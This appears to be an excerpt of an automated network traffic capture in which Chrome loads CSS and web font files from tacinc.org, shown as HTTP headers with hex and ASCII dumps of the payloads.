                                                                                                                                                                                                                              2024-10-23 18:04:01 UTC1369INData Raw: 2d 2d 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 70 78 3b 7d 2e 65 6c 65 6d 65 6e 74 6f 72 2d 37 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 2e 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 2d 38 36 63 33 63 66 61 2e 65 2d 63 6f 6e 7b 2d 2d 61 6c 69 67 6e 2d 73 65 6c 66 3a 66 6c 65 78 2d 73 74 61 72 74 3b 7d 2e 65 6c 65 6d 65 6e 74 6f 72 2d 37 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 2e 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 2d 38 36 33 36 63 65 38 7b 77 69 64 74 68 3a 76 61 72 28 20 2d 2d 63 6f 6e 74 61 69 6e 65 72 2d 77 69 64 67 65 74 2d 77 69 64 74 68 2c 20 31 30 30 25 20 29 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 3b 2d 2d 63 6f 6e 74 61 69 6e 65 72 2d 77 69 64 67 65 74 2d 77 69 64 74 68 3a 31 30 30 25
                                                                                                                                                                                                                              Data Ascii: --margin-right:0px;}.elementor-7 .elementor-element.elementor-element-86c3cfa.e-con{--align-self:flex-start;}.elementor-7 .elementor-element.elementor-element-8636ce8{width:var( --container-widget-width, 100% );max-width:100%;--container-widget-width:100%
                                                                                                                                                                                                                              2024-10-23 18:04:01 UTC1369INData Raw: 72 6f 77 3a 31 3b 2d 2d 66 6c 65 78 2d 73 68 72 69 6e 6b 3a 30 3b 7d 2e 65 6c 65 6d 65 6e 74 6f 72 2d 37 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 2e 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 2d 39 32 65 61 63 36 30 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 69 63 6f 6e 2d 77 72 61 70 70 65 72 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 3b 7d 2e 65 6c 65 6d 65 6e 74 6f 72 2d 37 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 2e 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 2d 39 62 35 31 30 64 32 7b 2d 2d 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 2d 2d 63 6f 6e 74 61 69 6e 65 72 2d 77 69 64 67 65 74 2d 77 69 64 74 68 3a 63 61 6c 63 28 20 28 20 31 20 2d
                                                                                                                                                                                                                              Data Ascii: row:1;--flex-shrink:0;}.elementor-7 .elementor-element.elementor-element-92eac60 .elementor-icon-wrapper{text-align:left;}.elementor-7 .elementor-element.elementor-element-9b510d2{--display:flex;--flex-direction:column;--container-widget-width:calc( ( 1 -
                                                                                                                                                                                                                              2024-10-23 18:04:01 UTC1369INData Raw: 6c 65 6d 65 6e 74 2d 31 62 38 34 62 65 34 2e 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 7b 2d 2d 61 6c 69 67 6e 2d 73 65 6c 66 3a 63 65 6e 74 65 72 3b 7d 2e 65 6c 65 6d 65 6e 74 6f 72 2d 37 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 2e 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 2d 31 62 38 34 62 65 34 7b 63 6f 6c 6f 72 3a 23 33 39 33 39 33 39 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 49 42 4d 20 50 6c 65 78 20 53 61 6e 73 22 2c 20 53 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 30 70 78 3b 7d 2e 65 6c 65 6d 65 6e 74 6f 72 2d 37 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 2e 65 6c 65 6d 65 6e
                                                                                                                                                                                                                              Data Ascii: lement-1b84be4.elementor-element{--align-self:center;}.elementor-7 .elementor-element.elementor-element-1b84be4{color:#393939;font-family:"IBM Plex Sans", Sans-serif;font-size:16px;font-weight:400;letter-spacing:0px;}.elementor-7 .elementor-element.elemen


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                              11192.168.2.649732141.193.213.104431424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:00 UTC614OUTGET /wp-content/themes/socialdriver/css/fonts/fontawesome-webfont.woff2?v=4.3.0 HTTP/1.1
                                                                                                                                                                                                                              Host: www.tacinc.org
                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                              Origin: https://www.tacinc.org
                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                              Sec-Fetch-Dest: font
                                                                                                                                                                                                                              Referer: https://www.tacinc.org/
                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                              2024-10-23 18:04:01 UTC427INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:01 GMT
                                                                                                                                                                                                                              Content-Type: font/woff2
                                                                                                                                                                                                                              Content-Length: 71896
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Last-Modified: Thu, 26 Sep 2024 14:03:48 GMT
                                                                                                                                                                                                                              ETag: "66f569c4-118d8"
                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                              Age: 614814
                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                              CF-RAY: 8d73a5aa5ae34750-DFW
                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                              2024-10-23 18:04:01 UTC942INData Raw: 77 4f 46 32 00 01 00 00 00 01 18 d8 00 0e 00 00 00 02 54 c8 00 01 18 79 00 04 01 89 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3f 46 46 54 4d 1c 1a 20 06 60 00 86 02 11 08 0a 88 bb 50 86 e9 4b 01 36 02 24 03 95 00 0b 95 18 00 04 20 05 86 7c 07 b2 4c 3f 77 65 62 66 06 5b 38 e0 91 00 d6 6d 3b af 74 05 e9 cd fa d3 d5 e7 e8 00 63 36 c2 d6 9b 15 96 f0 3e bc 53 ad 38 ae 7b 1c 80 19 5d 3f fb ff ff ff 3f 3d 69 8c a1 25 81 e6 00 50 d5 da ae da ad fb ff cf 66 38 35 4a 88 30 aa b9 75 04 0f b2 98 66 b1 b0 c9 65 42 af 5c d8 eb a6 02 45 b9 6c fb fd e8 fd 81 41 77 98 d6 36 84 11 1c 66 b3 11 46 c0 8e a0 30 6c 9b 0d c3 b6 4d 81 60 3b 69 96 4f df 9e 55 13 cb d4 b1 e6 6b d9 b6 22 3d e8 cb b2 0b eb c3 ba 8a 96 f2 90 c1 2f 36 0f e1 2f 65 58 0d 71 a4 d5 76 66
                                                                                                                                                                                                                              Data Ascii: wOF2Ty?FFTM `PK6$ |L?webf[8m;tc6>S8{]??=i%Pf85J0ufeB\ElAw6fF0lM`;iOUk"=/6/eXqvf
                                                                                                                                                                                                                              2024-10-23 18:04:01 UTC1369INData Raw: 4a 26 a2 b5 03 91 ea f2 44 c2 6d 6f 7d 13 09 30 f2 b7 69 a3 1e af 67 23 d8 69 7b d2 88 0c e8 e6 34 98 33 66 e3 93 3b 96 6d b7 19 fb cc d6 fc c0 76 7b 47 62 50 cf e3 0e 54 d8 13 23 60 60 bb b1 77 24 42 60 dd 58 a8 89 f5 9b e0 31 80 80 1b 63 1c b3 90 12 ff bf a9 56 9f 02 14 d1 cd 31 ce 68 9d 0b a2 76 6b 7c ba 1b 65 78 f7 bd aa e2 7b af 1e c0 aa 02 48 56 15 40 11 00 a9 16 00 52 52 15 88 16 01 90 33 05 90 d4 82 45 52 4b 51 3d 73 d8 6c af 9e dd a3 e9 75 6a ad 9b f1 40 81 52 13 94 d4 4b 50 6a 23 8d 35 d9 6e e6 ec 37 ce 06 d9 66 3f 9b c9 f6 6c 9a fe 20 fa 41 1e ff ff bf 74 d6 6f 05 93 b0 dd 93 c3 2e a5 c5 aa 3d 39 6f 43 5e ac ee ab 52 49 55 0a 50 92 10 a8 24 cb 08 70 90 b0 19 97 84 43 09 87 91 84 8c 41 4e 4a d0 22 b4 0f ed 9e 99 ef c9 38 fc 90 5f 09 68 4a e0 50
                                                                                                                                                                                                                              Data Ascii: J&Dmo}0ig#i{43f;mv{GbPT#``w$B`X1cV1hvk|ex{HV@RR3ERKQ=sluj@RKPj#5n7f?l Ato.=9oC^RIUP$pCANJ"8_hJP
                                                                                                                                                                                                                              2024-10-23 18:04:01 UTC1369INData Raw: 5f d7 69 62 3e 71 76 36 8e 44 29 d1 25 b6 60 62 d2 e8 ae d8 98 ef 9e 78 62 3a e6 db 4b be bb 6e 17 8b 23 4f d2 41 36 3b ef 8f b4 7e 8c 79 af 49 fa 26 98 bd bf ba 7e 0b d0 8b 17 70 e5 de 67 d6 f2 46 d2 09 c6 10 71 e8 99 61 ba f3 54 ca dd 2b 7c 76 fd 10 df 58 a1 db c4 28 d8 51 fe 0f 43 2e 03 11 01 e8 c8 4e d7 97 9a 91 b9 e1 f5 7a ea bd e1 17 4b 6a 9b 8e 4a 95 d9 53 34 c0 82 fd 40 66 30 b0 1c f0 33 a6 8b ef f0 72 02 b7 cc f8 f6 d5 d7 7b 41 94 02 03 f1 0d ad 6d f7 7c 24 e9 6f 7f 4f 1d e9 bd cd 26 37 1d af 3f b0 8f 99 0c aa af fd cd 3c 84 3e ff 5a f2 db cc 2f 90 29 8d ec 98 db 33 67 75 06 d1 5c 5e ab 7d 0c 9c 71 3c 8c 49 3e e0 a3 ba 89 88 70 bc 0d 46 40 98 01 96 a6 c8 1a a6 61 56 af 65 91 d3 8e e1 d0 bb a6 1b 1c 33 c4 f4 09 8f 67 0f b5 00 61 66 f7 69 ba e4 4b
                                                                                                                                                                                                                              Data Ascii: _ib>qv6D)%`bxb:Kn#OA6;~yI&~pgFqaT+|vX(QC.NzKjJS4@f03r{Am|$oO&7?<>Z/)3gu\^}q<I>pF@aVe3gafiK
                                                                                                                                                                                                                              2024-10-23 18:04:01 UTC1369INData Raw: f3 72 3c 36 13 69 8f 0c dd 54 e9 e1 68 78 30 19 8e 0f 85 b4 84 8b 7d 41 f9 86 07 68 2e c9 21 6a 2c 74 42 f8 b7 cf 53 e9 51 13 b0 e1 3e d3 d5 91 fb 39 10 5b c3 c1 8d 55 f7 cf 0b 74 87 87 70 87 46 df be a0 46 f0 eb 8b 7a 2a 3f 2b 2a 69 64 bb af bf 6a 43 3e 0a 77 e1 14 ea ef e8 6f d6 e2 09 fa 47 37 60 d8 eb 24 fb 1b d8 dc 32 2d bc f4 57 b8 a3 37 d6 32 82 93 1a b5 61 51 4b aa 4a 9f 27 32 dc c9 d8 90 fc fe 8a 7a 49 a1 72 04 34 c2 5e 94 6a 85 7c b8 1d f1 24 47 0d 85 6e f0 a2 a7 12 ee e8 25 9e f6 eb 4b 87 9a 56 22 e9 8c 44 ee 06 81 1b de e0 2a 38 5e c7 25 10 c1 e7 cf 5d 5a c5 29 88 2e de 9a fb d0 79 77 45 c7 46 5d a2 5c f4 96 5c e7 6b a6 58 b3 d0 c8 d8 7d f6 18 42 ac 89 75 33 b2 45 46 de ec b2 2c 68 70 e3 64 08 a4 5a ce 23 c9 59 b2 c7 07 47 52 a4 ab bf 79 d1 17
                                                                                                                                                                                                                              Data Ascii: r<6iThx0}Ah.!j,tBSQ>9[UtpFFz*?+*idjC>woG7`$2-W72aQKJ'2zIr4^j|$Gn%KV"D*8^%]Z).ywEF]\\kX}Bu3EF,hpdZ#YGRy
                                                                                                                                                                                                                              2024-10-23 18:04:01 UTC1369INData Raw: 79 2d f9 80 48 38 18 79 19 da 66 1e b2 33 ab 70 93 73 3b 42 e9 b4 c2 50 d8 a1 0a db 93 6b 36 bf c1 fe 78 77 81 2f f9 30 e7 f0 c6 c5 1e 42 f5 36 34 6d 69 17 f3 c9 f8 20 8d 52 9a 86 90 d6 fc e8 39 e2 f8 1c 66 7c 65 62 c6 d9 0c b6 92 eb 4f 9e 10 a6 07 43 43 70 b2 03 c1 fe 24 e2 d5 c9 59 57 2b e4 e3 cb 53 53 54 29 af 09 f6 10 94 ce 98 86 30 01 82 3e 5b e5 da e7 f0 8a 5d 6e 64 0a cd 0b c7 8d 0c 77 65 8c 74 77 d2 af 79 95 b3 d8 ac 4f e5 2a d0 50 d9 5b cb 2a d0 17 88 ac 42 75 2d 7d 41 6b 59 05 b0 bc 06 ca 03 48 01 8b 8a 1b 99 56 33 c3 5e 54 f6 8f ca 88 cc 85 1e 56 d1 24 ae d7 99 1b ed c6 b4 37 65 8c 7e fa 1b 0b a5 8b db e8 3c a6 32 01 36 e4 f1 e5 d0 8d d3 69 fe db 3f 3f 1e 5c b8 b2 ce 83 bf 32 e9 67 26 c0 20 61 1c 22 19 21 00 96 3a ca fd c9 4c 40 1a bb 15 a4 f0
                                                                                                                                                                                                                              Data Ascii: y-H8yf3ps;BPk6xw/0B64mi R9f|ebOCCp$YW+SST)0>[]ndwetwyO*P[*Bu-}AkYHV3^TV$7e~<26i??\2g& a"!:L@
                                                                                                                                                                                                                              2024-10-23 18:04:01 UTC1369INData Raw: 9e 4d df a8 9d d5 c4 97 37 91 7b c8 b9 db eb 16 0c b5 41 89 85 ba 72 6b 42 bf e8 bd c1 2a 65 9b 39 48 24 6a 5e e5 a7 7f 7d 7b ea 5a 54 51 0c 69 d2 b1 95 61 bb 3c a6 8f bc d0 54 94 f5 3d ce 87 26 e5 94 f5 ae eb f3 0d 4b 80 ef 28 c0 4d 81 a7 f0 39 49 c0 89 11 3e 88 5d 59 14 62 13 0d ea c2 d9 74 28 04 07 45 b6 0e 61 67 9b 46 b2 48 af f5 a0 46 75 ed 43 ae 85 b2 f2 12 ad d6 65 95 51 10 a3 ce 60 cc 6c 2a 18 04 53 da 64 ed 5f 25 4d b1 ba ef a4 ba ec 9c 23 73 16 68 db 3a 8b 13 9a 28 9c ce 4c 9c 54 c7 ac f9 9c 51 ce a5 d4 07 e8 14 01 98 a3 98 24 2a 56 9a 07 b3 56 ab 2d 71 e5 d2 bf dc 8b 18 6b d2 d7 2d 9d f9 c2 49 a3 4e c6 12 21 2f 1d 8e a5 8a e9 57 96 a3 9a 2a 52 93 a2 6a f9 cd 2a 56 ea 39 6a d4 3e 46 bb 54 e1 44 59 55 32 91 1b 3b 33 3d aa 04 d5 98 27 99 96 82 29
                                                                                                                                                                                                                              Data Ascii: M7{ArkB*e9H$j^}{ZTQia<T=&K(M9I>]Ybt(EagFHFuCeQ`l*Sd_%M#sh:(LTQ$*VV-qk-IN!/W*Rj*V9j>FTDYU2;3=')
                                                                                                                                                                                                                              2024-10-23 18:04:01 UTC1369INData Raw: 5a d0 af f8 37 7f ce 9e 2a b6 36 b0 52 5b 47 a8 ac d5 a1 39 5f 1b c7 6d 39 24 23 af fa 6e 8a 2e 27 1e fb fe 6a a5 70 45 f5 49 46 6e ef 99 2e bb 46 a6 d0 ac f7 6d 9f 35 0d 0f 78 8d c3 81 c9 7e 7a f7 42 c3 98 1b 76 9e 2d 24 7a 80 cb 4f fb f7 fe 3b 1a 36 4d b2 d3 33 57 5b 66 99 d9 5c 12 67 8c b1 75 d6 34 f4 32 e5 a7 5f e4 39 7a 53 fa 47 af ef af ab ec e3 17 09 03 9c de 62 7e f1 37 a0 cf 3a fa 20 27 f0 3c c3 0e ec 57 fd a6 85 1c b7 64 09 62 b9 96 74 16 6b 3d 1e 91 24 e0 61 b3 69 bc 13 c0 89 d6 c6 7a 04 7e 08 93 23 8b c0 17 66 b9 19 81 45 6f ab 05 a3 75 9d 53 3e 8c d8 d3 1b 00 ae d3 5e 07 f1 75 56 3c 10 b3 4b ab 01 ae d3 6c 02 30 61 a2 95 37 fa 90 cc 75 ee e4 e9 c7 5a 6a 93 96 2b 4c 54 8a b7 0d 38 f0 44 99 4b 25 2f de f9 ba 8c 4f a3 5c a8 d8 21 51 51 f5 8e b2
                                                                                                                                                                                                                              Data Ascii: Z7*6R[G9_m9$#n.'jpEIFn.Fm5x~zBv-$zO;6M3W[f\gu42_9zSGb~7: '<Wdbtk=$aiz~#fEouS>^uV<Kl0a7uZj+LT8DK%/O\!QQ
                                                                                                                                                                                                                              2024-10-23 18:04:01 UTC1369INData Raw: be 23 16 f6 7e 1e 7b e7 6a 1e f9 35 b4 8b f2 ee 1b 71 79 fc 0c d5 2c 84 f6 3e 2e af d7 98 9e 91 75 2e ae e8 31 e8 31 94 bc 1a 75 fe 75 8c 32 e2 4e b4 a0 dc 47 d9 32 d3 86 84 ff a9 ea 33 14 90 93 d8 70 65 2b c2 76 90 b2 30 c7 83 b2 96 d7 ba f4 fa 8e ee 9b d1 e9 d2 7b 0b f4 5b b7 25 84 fa d5 33 aa 5f e0 55 c4 d1 64 ef b6 80 e0 24 7f 62 76 e7 05 ad db e5 d1 2d 17 83 44 75 43 a5 96 37 9a e9 59 fe 5d e7 d5 4d 17 5f bd 4b 65 e8 1d d7 31 fc 6b e6 b2 82 de f4 17 e5 f9 fe 2a f2 ee d0 9b 8d 47 09 5b 09 30 00 0e 9a 92 5f 3d e4 5b 72 7f cb 65 df f5 ba a5 1c bb 89 b7 a8 ea 4b 9d a0 1f db f1 58 be 7d 62 39 83 dd 29 1c a8 a1 af 93 4c d4 8a 4c 99 fa 2e e2 e4 bc d3 9a f6 c8 2a 54 d7 f7 98 b3 44 67 2b 5c 59 05 df d1 67 6b e9 0b 3a a9 a8 0d b3 f2 eb b2 57 cf 53 69 94 f8 a3
                                                                                                                                                                                                                              Data Ascii: #~{j5qy,>.u.11uu2NG23pe+v0{[%3_Ud$bv-DuC7Y]M_Ke1k*G[0_=[reKX}b9)LL.*TDg+\Ygk:WSi
                                                                                                                                                                                                                              2024-10-23 18:04:01 UTC1369INData Raw: fc 34 98 ce c0 af f4 98 12 47 2d 59 95 93 d8 c8 85 4b d4 02 af 71 4b 6f a9 b0 b9 86 b2 9e a3 1f 79 1d df 21 80 da 0f 37 42 bf 4b 83 24 91 fc f1 1c f5 9f da 3b ec 7b 1e 84 86 bf 0f 91 16 18 88 ff ae ab 0c 61 70 a7 0f d5 ff 0e 94 8d f0 8e 56 7c 38 84 48 1b 25 69 9a 4e cd 3f 77 bc f0 56 56 74 b4 60 0e 77 96 9f 06 5d 9f 83 93 12 77 8d 58 e1 e6 6f 5b 33 f3 72 9f 13 19 84 39 73 c5 04 ab 0b d2 01 5b 30 ab 17 33 ca 38 84 dc 07 f1 df 75 0b eb d9 4d 64 88 8c 62 48 16 25 81 cc 03 4b 1a dd 8c 41 7f ab 8f e2 30 62 3e 5d 52 54 00 58 2c 46 03 ca 78 cb 27 20 c7 7b 89 d5 c4 12 0c 50 f3 4c a2 4b 80 98 6a 2e 7e 29 54 22 51 e3 04 16 a8 b1 94 d4 1b 50 31 82 f1 58 9b 67 69 f2 23 af 1a 2f 19 fa 84 5f 20 be f4 b9 27 14 f1 1e 5e 56 a3 a5 b1 53 9b 11 c6 5c 39 2c 97 72 f7 90 fe 24
                                                                                                                                                                                                                              Data Ascii: 4G-YKqKoy!7BK$;{apV|8H%iN?wVVt`w]wXo[3r9s[038uMdbH%KA0b>]RTX,Fx' {PLKj.~)T"QP1Xgi#/_ '^VS\9,r$
                                                                                                                                                                                                                              2024-10-23 18:04:01 UTC1369INData Raw: 36 b1 84 8d d5 de f3 53 ca 3f f0 c0 4a 98 25 10 86 ce 82 6a 9a 0a 6b e9 0b de d1 c0 0f e6 af 62 49 9d b8 9c 5a 16 8c dd c0 b8 2f fc 69 9b 1e 15 35 26 21 18 21 61 89 78 64 bc a1 ca 5b 53 f5 80 05 74 8d ac 63 ad 8d 8d 72 cd 43 1d 96 39 c9 91 54 72 f4 c4 aa 23 a7 4c 37 33 fa 24 85 97 7c 26 78 d4 04 e5 2f d6 b9 1c d9 06 9f f7 42 e8 59 78 31 68 a2 b4 c2 c7 4a ba fa ea f4 51 7b 37 38 a1 c1 d6 b8 a5 97 9b 44 5e e4 b1 e8 b6 92 c8 7a 73 29 20 00 0f b8 33 8f 18 89 b9 1d 06 2b 0a 2a 6f bf bf bd 7c 70 b4 ad db 44 52 dd 28 e1 ca 01 f8 1d 0b 10 ba 7d d7 9a c2 30 96 ff 70 34 35 e2 33 e9 7a 1b 82 c3 29 81 0e 67 79 f6 6d 93 1e 38 72 91 0f 8e 9e 67 c7 52 d7 0f 91 e4 96 47 6c 5c 05 31 9f 81 a3 d9 a6 6e 7b 45 5e b7 74 cb 6e d2 f8 7d bb c1 47 68 08 a3 74 d7 9e c2 ab c6 43 5e
                                                                                                                                                                                                                              Data Ascii: 6S?J%jkbIZ/i5&!!axd[StcrC9Tr#L73$|&x/BYx1hJQ{78D^zs) 3+*o|pDR(}0p453z)gym8rgRGl\1n{E^tn}GhtC^


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                              12192.168.2.649734141.193.213.104431424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:00 UTC594OUTGET /wp-content/themes/socialdriver/css/fonts/ss-gizmo.woff HTTP/1.1
                                                                                                                                                                                                                              Host: www.tacinc.org
                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                              Origin: https://www.tacinc.org
                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                              Sec-Fetch-Dest: font
                                                                                                                                                                                                                              Referer: https://www.tacinc.org/
                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                              2024-10-23 18:04:01 UTC425INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:01 GMT
                                                                                                                                                                                                                              Content-Type: font/woff
                                                                                                                                                                                                                              Content-Length: 61248
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Last-Modified: Thu, 26 Sep 2024 14:03:49 GMT
                                                                                                                                                                                                                              ETag: "66f569c5-ef40"
                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                              Age: 614814
                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                              CF-RAY: 8d73a5aa587f6b47-DFW
                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                              2024-10-23 18:04:01 UTC944INData Raw: 77 4f 46 46 00 01 00 00 00 00 ef 40 00 0f 00 00 00 01 b3 d4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 46 46 54 4d 00 00 ef 24 00 00 00 1c 00 00 00 1c 66 d3 6e dd 47 44 45 46 00 00 b9 18 00 00 00 2b 00 00 00 32 00 bb 01 84 47 50 4f 53 00 00 ee f8 00 00 00 2c 00 00 00 30 b8 ff b8 fe 47 53 55 42 00 00 b9 44 00 00 35 b2 00 00 9c be c5 ec 9e 2e 4f 53 2f 32 00 00 01 cc 00 00 00 46 00 00 00 60 90 ea 94 e9 63 6d 61 70 00 00 04 18 00 00 06 e8 00 00 0c d6 27 10 5a 67 67 61 73 70 00 00 b9 10 00 00 00 08 00 00 00 08 ff ff 00 03 67 6c 79 66 00 00 0d dc 00 00 a0 b9 00 00 f0 b8 42 6c ca 39 68 65 61 64 00 00 01 58 00 00 00 31 00 00 00 36 02 d4 4f ef 68 68 65 61 00 00 01 8c 00 00 00 1e 00 00 00 24 11 7c 04 b8 68 6d 74 78 00 00 02 14 00 00 02
                                                                                                                                                                                                                              Data Ascii: wOFF@FFTM$fnGDEF+2GPOS,0GSUBD5.OS/2F`cmap'ZggaspglyfBl9headX16Ohhea$|hmtx
                                                                                                                                                                                                                              2024-10-23 18:04:01 UTC1369INData Raw: 60 b2 50 32 9f 4f e8 f0 67 3a 59 d2 fe 01 8a f6 ad af 09 67 3a d4 35 b9 fe 1e 2f 3b b8 8e bb f6 36 44 bd 46 77 f5 da ab 70 2e ad 9b d4 f1 7e 9c f7 30 cd 38 d1 45 6d a9 6b 1f 92 0a 49 2b f6 09 6a 31 8d 9d 26 93 4f bb 32 d5 9d 5f 00 7a 7b ff 44 87 ca 5c b7 c8 57 f5 4e da af 34 80 51 b4 ff a3 bf 6c 37 ab 0d 00 00 78 da e5 96 6d 70 54 d5 19 c7 ff 27 1b 58 30 71 ef 26 d9 6c 82 6c c2 26 9b dc 15 d6 48 44 50 42 6b 0d 61 c5 aa 28 64 52 a5 c4 97 16 30 0a d5 76 62 46 a5 52 1d 32 0d 50 ab ad 15 4a 3b 30 5a 67 33 d8 b1 f8 9a a9 8c 33 35 4e a1 1d 63 9d b6 84 cc a8 23 77 27 81 65 09 49 f6 25 09 e7 92 44 db 71 66 fb 3f f7 a4 8e fa a1 33 fd d0 4f dd 99 df fe 9e bd 77 f7 de f3 9c f3 9c e7 2e 80 39 00 5c e4 0a 72 09 90 9f 0f c1 08 05 03 3c 2a 9c e3 ae d9 e3 f9 ae 53 fc 6c
                                                                                                                                                                                                                              Data Ascii: `P2Og:Yg:5/;6DFwp.~08EmkI+j1&O2_z{D\WN4Ql7xmpT'X0q&ll&HDPBka(dR0vbFR2PJ;0Zg335Nc#w'eI%Dqf?3Ow.9\r<*Sl
                                                                                                                                                                                                                              2024-10-23 18:04:01 UTC1369INData Raw: 68 72 09 51 7d 60 84 e6 d8 e4 0a 3d d9 92 63 91 aa 07 71 d2 24 fb 82 54 e3 61 52 92 6b 2b 55 dd b2 17 48 ee 0d b9 15 ce 00 24 f7 80 54 7b f0 22 dd a1 c1 27 34 d7 52 3e cf f8 53 9a eb 25 39 df c2 a5 fe e6 10 8e 59 30 37 5b 7d e6 5c 09 8e db e6 98 6d 8e 55 70 bf d9 41 8d b8 94 ae d1 08 ee 37 9b f3 69 73 3e 05 fb 82 1d d5 08 e6 69 b7 6b 04 f7 9e dd a9 11 bc d6 54 8f 46 b0 77 4c f3 be d3 ea be ec 83 d3 ac 81 69 7e 57 94 03 33 3c 3e a3 8e f3 19 75 91 ff d1 2e 72 5c a2 92 76 93 79 8c 83 b4 c7 01 a2 9a 2e 26 6a 9c 21 da 4f 16 30 36 e9 1b 1d 20 96 d0 37 93 5b 18 47 e8 f5 0e 10 75 74 8b 03 c4 95 f4 ed 0e 10 4b e9 8d 0e 10 f5 f4 3d 84 fd 49 5c 45 3f 4c b8 ef c5 d5 f4 0e 07 88 15 f4 4b 0e 10 d7 d0 af 3b 40 5c 0b 31 d5 e8 00 b1 92 5e 4b d8 a7 45 03 7d 2b 61 3f 16 d7
                                                                                                                                                                                                                              Data Ascii: hrQ}`=cq$TaRk+UH$T{"'4R>S%9Y07[}\mUpA7is>ikTFwLi~W3<>u.r\vy.&j!O06 7[GutK=I\E?LK;@\1^KE}+a?
